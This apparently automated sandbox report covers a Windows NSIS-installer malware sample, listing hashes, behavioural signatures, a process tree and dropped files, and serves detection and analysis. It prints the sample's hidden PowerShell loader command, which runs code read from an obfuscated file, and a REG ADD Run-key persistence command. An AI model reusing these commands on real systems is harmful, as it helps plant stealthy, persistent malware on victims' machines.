Analysis
- max time kernel: 145s
- max time network: 154s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 23-05-2024 01:43
Tasks
- Static task static1
- Behavioral task behavioral1: sample 8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe, resource win7-20240221-en
- Behavioral task behavioral2: sample 8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe, resource win10v2004-20240426-en
- Behavioral task behavioral3: sample $PLUGINSDIR/nsDialogs.dll, resource win7-20240508-en
- Behavioral task behavioral4: sample $PLUGINSDIR/nsDialogs.dll, resource win10v2004-20240426-en
- Behavioral task behavioral5: sample $PLUGINSDIR/nsExec.dll, resource win7-20240508-en
- Behavioral task behavioral6: sample $PLUGINSDIR/nsExec.dll, resource win10v2004-20240508-en
General
- Target: 8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe
- Size: 541KB
- MD5: 93616677d7d1ebbfb979b905150bb3cd
- SHA1: 87037c76bc789909d49fa81887ce8465436f3ca0
- SHA256: 8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8
- SHA512: cc17b5c1266c01dd8bf1d2a5269e228a3389083eca13cc1352f6638ab72a95beecc4e3a7b29d892813eb1843b0bd8b207fa987ad6224dfab6b606167946b5595
- SSDEEP: 12288:iH7MMIqb9BVAG8ITBF8qgvpnu1uo6c1yZODqCNtEplW8LmP:C7a69BVxh65K6+drGlW8LmP
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run PowerShell and hide display window.
- Loads dropped DLL (4 IoCs)
  Processes (pid, process):
  2812  8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe
  2812  8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe
  2492  powershell.exe
  1616  Disfranchising.exe
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes (description, ioc, process):
  Set value (str)  \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Beslutningsivrighed% -windowstyle minimized $stedtes=(Get-ItemProperty -Path 'HKCU:\\Stjydsk\\').Coswearer;%Beslutningsivrighed% ($stedtes)"  reg.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes (pid, process):
  2492  powershell.exe
  1616  Disfranchising.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes (description, pid, process, target process):
  PID 2492 set thread context of 1616  2492  powershell.exe  Disfranchising.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- NSIS installer (2 IoCs)
  Processes (resource, yara_rule):
  \Users\Admin\AppData\Local\Temp\Disfranchising.exe  nsis_installer_1
  \Users\Admin\AppData\Local\Temp\Disfranchising.exe  nsis_installer_2
- Modifies registry key (1 TTP, 1 IoC)
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes (pid, process):
  2492  powershell.exe
  2492  powershell.exe
  2492  powershell.exe
  2492  powershell.exe
  2492  powershell.exe
  2492  powershell.exe
  2492  powershell.exe
  2492  powershell.exe
- Suspicious behavior: MapViewOfSection (1 IoC)
  Processes (pid, process):
  2492  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description, pid, process):
  Token: SeDebugPrivilege  2492  powershell.exe
- Suspicious use of WriteProcessMemory (22 IoCs)
  Processes (description, pid, process, target process):
  PID 2812 wrote to memory of 2492  2812  8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe  powershell.exe
  PID 2812 wrote to memory of 2492  2812  8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe  powershell.exe
  PID 2812 wrote to memory of 2492  2812  8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe  powershell.exe
  PID 2812 wrote to memory of 2492  2812  8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe  powershell.exe
  PID 2492 wrote to memory of 2352  2492  powershell.exe  cmd.exe
  PID 2492 wrote to memory of 2352  2492  powershell.exe  cmd.exe
  PID 2492 wrote to memory of 2352  2492  powershell.exe  cmd.exe
  PID 2492 wrote to memory of 2352  2492  powershell.exe  cmd.exe
  PID 2492 wrote to memory of 1616  2492  powershell.exe  Disfranchising.exe
  PID 2492 wrote to memory of 1616  2492  powershell.exe  Disfranchising.exe
  PID 2492 wrote to memory of 1616  2492  powershell.exe  Disfranchising.exe
  PID 2492 wrote to memory of 1616  2492  powershell.exe  Disfranchising.exe
  PID 2492 wrote to memory of 1616  2492  powershell.exe  Disfranchising.exe
  PID 2492 wrote to memory of 1616  2492  powershell.exe  Disfranchising.exe
  PID 1616 wrote to memory of 1648  1616  Disfranchising.exe  cmd.exe
  PID 1616 wrote to memory of 1648  1616  Disfranchising.exe  cmd.exe
  PID 1616 wrote to memory of 1648  1616  Disfranchising.exe  cmd.exe
  PID 1616 wrote to memory of 1648  1616  Disfranchising.exe  cmd.exe
  PID 1648 wrote to memory of 2284  1648  cmd.exe  reg.exe
  PID 1648 wrote to memory of 2284  1648  cmd.exe  reg.exe
  PID 1648 wrote to memory of 2284  1648  cmd.exe  reg.exe
  PID 1648 wrote to memory of 2284  1648  cmd.exe  reg.exe
Processes (tree; indentation shows parent/child, level in parentheses)
- C:\Users\Admin\AppData\Local\Temp\8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe (level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 2)
    Command line: "powershell.exe" -windowstyle hidden "$Twiddly=Get-Content 'C:\Users\Admin\AppData\Local\nondefence\kledyrenes\mesoblastema\Samkrt.ska';$Careeristic=$Twiddly.SubString(52755,3);.$Careeristic($Twiddly)"
    - Command and Scripting Interpreter: PowerShell
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe (level 3)
      Command line: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
    - C:\Users\Admin\AppData\Local\Temp\Disfranchising.exe (level 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\Disfranchising.exe"
      - Loads dropped DLL
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (level 4)
        Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Beslutningsivrighed% -windowstyle minimized $stedtes=(Get-ItemProperty -Path 'HKCU:\Stjydsk\').Coswearer;%Beslutningsivrighed% ($stedtes)"
        - Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\reg.exe (level 5)
          Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Beslutningsivrighed% -windowstyle minimized $stedtes=(Get-ItemProperty -Path 'HKCU:\Stjydsk\').Coswearer;%Beslutningsivrighed% ($stedtes)"
          - Adds Run key to start application
          - Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\nondefence\kledyrenes\mesoblastema\Erstatningssagerne.Kla
  Filesize: 278KB
  MD5: 4f78e43df25c818fd771e53a4a20ff12
  SHA1: 5760d9a9a52598353829595bd4df180a08377a12
  SHA256: 7a3580d146706d7ee3430c8e06dbaa24ede269bcbd67a4936dabae9ed904c415
  SHA512: eb5c82bc6766a71654ebbeafd4df40e8d3519660c0529337da453ac5c5edc18ae0ae3cf3303b0bfee6f5a3085dc34c6e04dfc03f30b69003bdedaaa19acf0d3a
- C:\Users\Admin\AppData\Local\nondefence\kledyrenes\mesoblastema\Samkrt.ska
  Filesize: 51KB
  MD5: afd9c594ed116f7cdfe6c432ce10ff17
  SHA1: a685bf1da29f74b5c9ac802b51a6c5e75a888285
  SHA256: 4832ff867a3915d5958b2d072fc93076f940f654c04f6bba8c9f80b8ea789dfb
  SHA512: 05738b6c609f28615f8d7c6725885fd44fe54370f8880385dc5056ff0c37525e7add80747ae657ea0c45f40932ded22c6099122f9dc7ebdad14145f513722917
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\degum.lnk
  Filesize: 890B
  MD5: b4fef5471fddd48700b7aea5b3ac12ce
  SHA1: a272b375ee5a7a1709d0c913a85f59ebd68695e5
  SHA256: ea71ef3c6fa0f98b7bc764685d8284f5878cf3d6f25c8989911be76d29f84916
  SHA512: d430702ce350d10bc815db44a40b251e7cd8e5f18ccaff7a8a743e231eb0d18530e65fb90c85e466b51368baaed2668c5ed8e340117ceae599f6d5d5d2003033
- \Users\Admin\AppData\Local\Temp\Disfranchising.exe
  Filesize: 541KB
  MD5: 93616677d7d1ebbfb979b905150bb3cd
  SHA1: 87037c76bc789909d49fa81887ce8465436f3ca0
  SHA256: 8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8
  SHA512: cc17b5c1266c01dd8bf1d2a5269e228a3389083eca13cc1352f6638ab72a95beecc4e3a7b29d892813eb1843b0bd8b207fa987ad6224dfab6b606167946b5595
- \Users\Admin\AppData\Local\Temp\nsy840F.tmp\nsDialogs.dll
  Filesize: 9KB
  MD5: 1c8b2b40c642e8b5a5b3ff102796fb37
  SHA1: 3245f55afac50f775eb53fd6d14abb7fe523393d
  SHA256: 8780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c
  SHA512: 4ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57
- memory/1616-75-0x0000000000400000-0x0000000001462000-memory.dmp
  Filesize: 16.4MB
- memory/1616-74-0x0000000000400000-0x0000000001462000-memory.dmp
  Filesize: 16.4MB
- memory/2492-63-0x0000000073900000-0x0000000073EAB000-memory.dmp
  Filesize: 5.7MB
- memory/2492-62-0x0000000073900000-0x0000000073EAB000-memory.dmp
  Filesize: 5.7MB
- memory/2492-67-0x0000000073900000-0x0000000073EAB000-memory.dmp
  Filesize: 5.7MB
- memory/2492-69-0x0000000006160000-0x000000000A653000-memory.dmp
  Filesize: 68.9MB
- memory/2492-61-0x0000000073900000-0x0000000073EAB000-memory.dmp
  Filesize: 5.7MB
- memory/2492-60-0x0000000073900000-0x0000000073EAB000-memory.dmp
  Filesize: 5.7MB
- memory/2492-59-0x0000000073901000-0x0000000073902000-memory.dmp
  Filesize: 4KB